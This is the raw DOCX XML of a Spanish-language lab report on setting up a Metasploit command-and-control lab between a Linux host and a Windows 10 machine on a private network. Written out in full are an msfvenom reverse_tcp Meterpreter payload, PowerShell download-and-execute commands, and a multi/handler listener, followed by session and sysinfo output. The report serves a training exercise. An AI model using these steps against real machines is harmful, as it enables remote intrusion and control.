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 w14:paraId="0000000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6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Informe Técnico de Red Team: Configuración de Laboratorio y Explotación (C&amp;C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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El presente informe detalla el proceso de configuración de un laboratorio de pruebas para simular un escenario de Red Team, donde se establece un Command and Control (C&amp;C) entre una máquina Linux y una máquina Windows 10. Se documentan las acciones realizadas, los resultados obtenidos, y los pasos necesarios para cumplir con los objetivos establecidos en la práctica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000005">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Configurar un laboratorio con dos máquinas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006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Máquina Linux (C&amp;C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007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Máquina Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Asegurar visibilidad mutua entre ambas máquinas en la misma red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Instalar un Command and Control (C&amp;C) y generar un payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Infectar la máquina Windows 10 con el payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000B">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Establecer una conexión exitosa con Meterpreter para interactuar con la máquina Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Configuración del Laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000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2.1. Entorno de Red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000F">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Se configuraron las máquinas dentro de la misma red local (192.168.1.0/24) para garantizar visibilidad mutua.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000010">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Asignaciones IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000011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Linux (C&amp;C):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000012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Windows 10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001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2.2. Verificación de Conectividad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000015">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Prueba desde Linux hacia Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000016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Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000017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Resultado: Conectividad exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000018">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Prueba desde Windows hacia Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000019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Comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping 192.168.1.32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001A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Resultado: Conectividad exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001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rtl w:val="off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Captura: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1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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="3991610" cy="2262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color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1531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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Instalación de Metasploit y Configuración del C&amp;C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001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3.1. Instalación de Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000020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En la máquina Linux (Debian), se utilizó Metasploit como plataforma para Command and Control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000021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Comando utilizado para iniciar Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000022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s-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sudo apt install metasploit-framework -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000023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</w:p>
    <w:p w14:paraId="0000002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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="5487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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Generación del Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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4.1. Comando Utilizado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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urier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=4444 -f exe -o payload.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002A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LHOST:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dirección IP de la máquina Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002B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LPORT:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Puerto configurado para escuchar conexiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002C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El payload fue guardado como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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Captura:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1278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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002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4.2. Transferencia del Payload a Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000030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Se utilizó un servidor HTTP en la máquina Linux para transferir el archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000031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Comando para iniciar el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8080 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000033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Descarga en Windows con PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://192.168.1.32:8080/payload.exe -OutFile payload.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1979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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Ejecución del Payload y Conexión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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5.1. Configuración de Metasploit para Escuchar Conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003A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Comandos en Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.32 set LPORT 4444 exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1999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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003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5.2. Ejecución del Payload en Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003F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Comando utilizado en PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start-Process "C:\ruta\payload.exe" -Verb RunAs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000042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Resultado: Apertura de una sesión Meterpreter desde la máquina Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1194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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Verificación de la Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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6.1. Verificación de Sesión Activa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000047">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Comando en Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copiar código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004B">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004C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Id:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004D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Tipo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> meterpreter x86/windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004E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Información:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WIN10\Dani @ WIN10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004F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Conexión:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.32:4444 -&gt; 192.168.1.10:XXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="1202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>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005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6.2. Comprobaciones en Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000053">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Información del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000005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color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000056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Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000057">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr>
          <w:ilvl w:val="2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2160"/>
        </w:tabs>
        <w:bidi w:val="off"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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Sistema Operativo: Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000058">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr>
          <w:ilvl w:val="2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2160"/>
        </w:tabs>
        <w:bidi w:val="off"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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Arquitectura: x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000059">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr>
          <w:ilvl w:val="2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2160"/>
        </w:tabs>
        <w:bidi w:val="off"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="216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Usuario: WIN10\Dani</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005A">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Usuario actual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005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Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">getuid </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005C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Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WIN10\Dani</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005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rtl w:val="off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Captura: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="2919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5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drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5731510" cy="2392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Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006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2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7. Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000062">
      <w:pPr>
        <w:framePr w:w="0" w:h="0" w:vAnchor="margin" w:hAnchor="text" w:x="0" w:y="0"/>
        <w:numPr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Objetivos Cumplidos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000063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Configuración de un laboratorio funcional con visibilidad entre las máquinas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000064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Instalación de un Command and Control utilizando Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000065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Generación y transferencia de un payload para Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000066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Establecimiento de una sesión activa con Meterpreter desde la máquina Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000067">
      <w:pPr>
